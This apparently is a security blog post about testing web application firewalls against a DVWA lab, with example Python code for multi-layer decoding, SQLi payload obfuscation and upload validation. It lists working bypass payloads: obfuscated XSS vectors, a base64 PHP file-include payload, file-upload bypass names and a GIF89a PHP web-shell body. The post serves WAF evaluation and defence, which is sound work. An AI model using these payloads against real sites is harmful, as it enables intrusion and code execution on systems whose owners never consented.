Published on September 16, 2016 | Category: security
Many colleagues on the Internet have published articles discussing various WAF techniques, and many of them share ideas on building a WAF yourself. As a security engineer on the customer side (Party A) in a traditional industry, I want to write down my general approach to a WAF selection test. On the one hand it is a summary of a completed project; on the other it offers a different perspective on WAF, which I hope will help friends on the vendor side (Party B) design and optimise WAF products in the future.
0x01 Test approach
- Environment:
  - Server: DVWA is used to build a site containing the various vulnerabilities, with access logging enabled for later analysis. The DVWA build process is not covered here.
  - WAF: deployed as a reverse proxy. The DVWA server is the back end behind a virtual server (VS) IP on the WAF. During the test all payloads are sent to the VS IP, processed by the WAF, and then forwarded to the DVWA server.
- Test method: the client constructs a payload and submits it to the VS IP, then the server's access log is checked. If the payload is correctly identified and filtered, nothing related to it should appear in the access log.
0x02 General defense against the OWASP Top 10
- SQLi
  - GET injection: the id parameter of http://10.44.100.18/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit# is injectable; just construct the payload and submit it.
  - POST injection: capture the DVWA login request with Burp Suite and build a POST injection from it.
- XSS
  - DVWA provides both reflected and stored XSS, so it is enough to construct payloads.
- CSRF, command injection, brute force, file upload and the rest are all available in DVWA and are not elaborated on here.
- What is missing are SSRF, deserialization, Struts and Heartbleed. These attacks are not built into the current version of DVWA and need to be considered separately.
0x03 Defense against bypass techniques
Beyond defending against the most common attack techniques, a WAF should also be able to recognise deformed (obfuscated) payloads. Commercial WAFs at home and abroad can now recognise more than 99% of conventional attack methods; the difference between them lies mainly in how well they parse payloads deformed by the various encodings. There are two schools of thought.
Idea 1:
After the WAF captures the HTTP packet it decodes it several times, extracts the result of each decoding pass, and matches it against the signature library. Products differ in how many layers they can decode: F5's ASM supports up to 5 layers and lets the user set the number manually; others do not let the user specify the number of decoding layers, but all have the corresponding capability.
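As an added illustration of Idea 1 (this is example code written for this page, not the original post's work and not any vendor's engine), the following Python sketch decodes a parameter value layer by layer and re-runs a small signature library after each pass, with a configurable layer limit like the ASM setting mentioned above. It goes slightly beyond the paragraph by folding %uXXXX decoding, HTML entity decoding and NUL-byte stripping into each layer. The signature regexes, the `inspect`/`decode_once` names and the sample inputs are all constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# A tiny stand-in for a WAF feature library (constructed for this example).
SIGNATURES = {
    "sqli_union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "sqli_or_tautology": re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),
    "xss_script_tag":    re.compile(r"<\s*script\b", re.I),
    "xss_event_handler": re.compile(r"\bon\w+\s*=", re.I),   # coarse: also fires on 'online='
}

def decode_once(s: str) -> str:
    """One decoding layer: %uXXXX, then percent-decoding, then HTML entities,
    then drop NUL bytes (the %00 trick used in the XSS payloads later on)."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    s = unquote(s)
    s = html.unescape(s)
    return s.replace("\x00", "")

def match_signatures(s: str):
    """Return the name of the first signature that hits, or None."""
    for name, rx in SIGNATURES.items():
        if rx.search(s):
            return name
    return None

def inspect(value: str, max_layers: int = 5):
    """Match the raw value (layer 0), then decode and re-match up to max_layers times.
    Returns (signature_name, layer_it_matched_on) or (None, last_layer_examined)."""
    current = value
    layer = 0
    while True:
        hit = match_signatures(current)
        if hit:
            return hit, layer
        if layer == max_layers:
            return None, layer
        decoded = decode_once(current)
        if decoded == current:          # nothing left to decode: fixed point
            return None, layer
        current = decoded
        layer += 1

if __name__ == "__main__":
    samples = [   # constructed inputs
        "1%27%20UNION%20SELECT%20user%2Cpassword%20FROM%20users--",           # single URL-encoded
        "1%2527%2520UNION%2520SELECT%2520user%2520FROM%2520users--",         # double URL-encoded
        "%3Cs%00c%00r%00%00ip%00t%3Econfirm(0)%3C/s%00c%00r%00%00ip%00t%3E",  # NUL-split <script>
        "id=22&Submit=Submit",                                               # benign DVWA query
    ]
    for layers in (1, 5):
        print("max_layers =", layers)
        for s in samples:
            print("  ", inspect(s, max_layers=layers), s)
```

With `max_layers=1` the double-URL-encoded sample passes untouched; raising the limit to 2 or more catches it on layer 2, which is exactly the gap a selection test should probe. The coarse event-handler regex also shows why Idea 2 exists: it will fire on a harmless `online=` parameter.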
Idea 2:
Since regex matching is prone to both false positives and false negatives, some vendors have abandoned this approach in favour of semantic analysis. Chaitin Tech's SQLChop is an example; see "SQLChop, a new SQL injection detection engine" for details. During the test, payloads have to be encoded and deformed by hand. Specifically:
SQLi deformation
- URL encoding: don't underestimate this common bypass; some vendors' WAFs genuinely fail to detect it.
- Unicode encoding
- Keyword case alternation: fairly conventional; basically every WAF detects it.
- Keywords converted to hex
- Keywords in backticks
- Keywords wrapped in /*!...*/ inline comments
- Keywords split with /**/ comments: select becomes sel/**/ect
- Keywords split with %00
- In the submitted HTTP request, set X-Originating-IP to 127.0.0.1
- In the submitted HTTP request, set X-Remote-Addr to 127.0.0.1
- sqlmap's various tampers, tried one by one
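The deformations in the list above as a small payload generator, added here as example code (it is not from the original post and not sqlmap's tamper code): each function applies one technique to a base payload and `variants()` collects them, so the tester can submit each one to the VS IP and check the access log. The keyword list, function names and base payload are constructed for the example; the two header names are the ones the list gives.

```python
import re
from urllib.parse import quote, unquote

# SQL keywords a WAF feature library is most likely to key on (constructed list).
KEYWORDS = ("UNION", "SELECT", "FROM", "WHERE", "AND", "OR")
_KW = re.compile(r"\b(%s)\b" % "|".join(KEYWORDS), re.I)

def url_encode(p: str, times: int = 1) -> str:
    """Percent-encode every non-alphanumeric byte; times=2 gives double encoding."""
    for _ in range(times):
        p = quote(p, safe="")
    return p

def unicode_encode(p: str) -> str:
    """IIS-style %uXXXX encoding of every character."""
    return "".join("%%u%04X" % ord(c) for c in p)

def case_swap(p: str) -> str:
    """AlTeRnAtE the case of each keyword."""
    return _KW.sub(lambda m: "".join(c.upper() if i % 2 == 0 else c.lower()
                                     for i, c in enumerate(m.group(1))), p)

def string_to_hex(p: str) -> str:
    """Replace ='literal' with a MySQL hex literal, which removes the quote characters."""
    return re.sub(r"=\s*'([^']*)'",
                  lambda m: "=0x" + m.group(1).encode().hex(), p)

def backtick_tables(p: str) -> str:
    """Quote the table name after FROM with backticks (MySQL identifier quoting)."""
    return re.sub(r"\b(FROM)\s+(\w+)", r"\1 `\2`", p, flags=re.I)

def inline_comment(p: str) -> str:
    """Wrap keywords in MySQL versioned comments: SELECT -> /*!SELECT*/ (still executed)."""
    return _KW.sub(lambda m: "/*!%s*/" % m.group(1), p)

def split_keyword(p: str, filler: str = "/**/") -> str:
    """Break each keyword in the middle with filler: SELECT -> SEL/**/ECT.
    Caveat: this defeats a naive regex, but MySQL does not join SEL/**/ECT back into
    SELECT; whether the back end still executes the query must be checked separately."""
    def cut(m):
        kw = m.group(1)
        return kw[:len(kw) // 2] + filler + kw[len(kw) // 2:]
    return _KW.sub(cut, p)

def null_split(p: str) -> str:
    """Same idea with a literal %00 in the middle of each keyword."""
    return split_keyword(p, filler="%00")

def spoof_client_headers() -> dict:
    """The two headers the list names for pretending the request came from localhost."""
    return {"X-Originating-IP": "127.0.0.1", "X-Remote-Addr": "127.0.0.1"}

def variants(payload: str) -> dict:
    """Every single-step deformation of one base payload, keyed by technique name."""
    return {
        "url_encode": url_encode(payload),
        "double_url_encode": url_encode(payload, times=2),
        "unicode_encode": unicode_encode(payload),
        "case_swap": case_swap(payload),
        "string_to_hex": string_to_hex(payload),
        "backtick_tables": backtick_tables(payload),
        "inline_comment": inline_comment(payload),
        "split_keyword": split_keyword(payload),
        "null_split": null_split(payload),
        # chained: comment-split first, then URL-encode the result
        "split_then_url_encode": url_encode(split_keyword(payload)),
    }

if __name__ == "__main__":
    base = "1' UNION SELECT user,password FROM users WHERE user='admin'-- "   # constructed
    for name, v in variants(base).items():
        print("%-22s %s" % (name, v))
    print(spoof_client_headers())
```

Each variant is sent as the value of the injectable parameter (the DVWA id parameter in this test); a WAF that only decodes one layer should be expected to pass `double_url_encode`, and `split_then_url_encode` checks that decoding and comment handling are combined rather than applied in isolation.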
XSS deformation
XSS has the most deformations and is where WAFs miss the most; HTML simply has too many tags. How well this part is tested depends on the size of the tester's XSS payload collection. I list only a few common ones for reference:
1. `<embed/src=//goo.gl/nlX0P>`
2. `<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">`
3. `<a onmouseover="javascript:window.onerror=alert;throw 1>`
4. `<svg><script>var myvar="YourInput";</script></svg>`
5. `<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>`
6. `<script>//@cc_on!alert(1)/*@cc_on~alert(2)@*/</script>`
7. `<marquee/onstart=confirm(2)>/`
8. `<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>XSS`
File include bypass
1. `data:text/plain;base64,ZGF0YTp0ZXh0L3BsYWluLDw/cGhwIHN5c3RlbSgnY2F0IC92YXIvd3d3L0ZpbGVJbmNsdWRlLnBocCcpPz4=`
File upload bypass
The main things to consider for file upload bypass are:
- 123.php.123
- 123.asp;.gif
- as.php%00.gif
- Prepending GIF89a to the file content
- Content-Type: image/jpeg
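An added example (written for this page, not taken from the post or from DVWA) of the upload check these bypasses are aimed at, next to a stricter validator. `naive_accepts` blacklists the last extension and trusts the client's Content-Type, so every item in the list gets through; `strict_accepts` allowlists a single extension, rejects NUL and `;` in the name, checks magic bytes, and lets the server choose the stored name. The allowlist table, function names and sample uploads are constructed.

```python
import re
import secrets
from urllib.parse import unquote

# Extension -> magic bytes the file must start with (constructed allowlist).
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
SCRIPT_EXTS = {"php", "asp", "aspx", "jsp"}

def naive_accepts(filename: str, content_type: str, data: bytes) -> bool:
    """The check the bypasses above defeat: a blacklist on the LAST extension
    plus trust in the client-supplied Content-Type. The body is never looked at."""
    last_ext = filename.rsplit(".", 1)[-1].lower()
    return last_ext not in SCRIPT_EXTS and content_type.startswith("image/")

def strict_accepts(filename: str, content_type: str, data: bytes):
    """Allowlist check. Returns (True, stored_name) or (False, reason).
    Content-Type is deliberately ignored because it is attacker-controlled."""
    name = unquote(filename)                       # 'as.php%00.gif' -> NUL byte in name
    if "\x00" in name or "/" in name or "\\" in name or ";" in name:
        return False, "forbidden character in filename"
    parts = name.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False, "need exactly one extension and a plain base name"   # kills 123.php.123
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension not in allowlist"
    if not data.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match extension"
    # Magic bytes are necessary, not sufficient: 'GIF89a<?php ...' passes this far.
    # So the server picks the stored name itself (the attacker's name is discarded),
    # and the upload directory must be served without script execution.
    return True, secrets.token_hex(16) + "." + ext

if __name__ == "__main__":
    php_image = b"GIF89a<?php system($_GET['c']); ?>"   # constructed polyglot body
    uploads = [
        ("123.php.123", "image/jpeg", b"<?php"),
        ("123.asp;.gif", "image/gif", b"<?php"),
        ("as.php%00.gif", "image/gif", b"<?php"),
        ("avatar.gif", "image/jpeg", php_image),
    ]
    for fn, ct, body in uploads:
        print("%-14s naive=%-5s strict=%s" % (fn, naive_accepts(fn, ct, body),
                                            strict_accepts(fn, ct, body)))
```

The last sample is the GIF89a case from the list: it is accepted by both checks, which is the point of the comment in `strict_accepts`; content checks only narrow the problem, and the real control is that nothing under the upload directory is ever executed as a script.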
0x04 Scanner defense capability
A WAF should be able to identify scanners by the characteristics of their traffic and block them. Common scanners such as WVS, sqlmap, Netsparker, Havij and AppScan should be run against the WAF to observe its response. Note that the WAF should not only intercept the scanner's packets but also indicate in its log which scanner the attacker is using; this is very helpful to operations staff analysing the logs. In the actual test, for example, Imperva accurately identified sqlmap and Netsparker, F5's ASM accurately identified WVS and sqlmap, and FortiWeb did not have this capability.
The remaining sections will cover:
- Webshell communication interception test
- Other small function point tests
- Security test of the appliance itself
- Self-learning mode test
- WAF test tools
- WAF management and maintenance function test
(To be continued)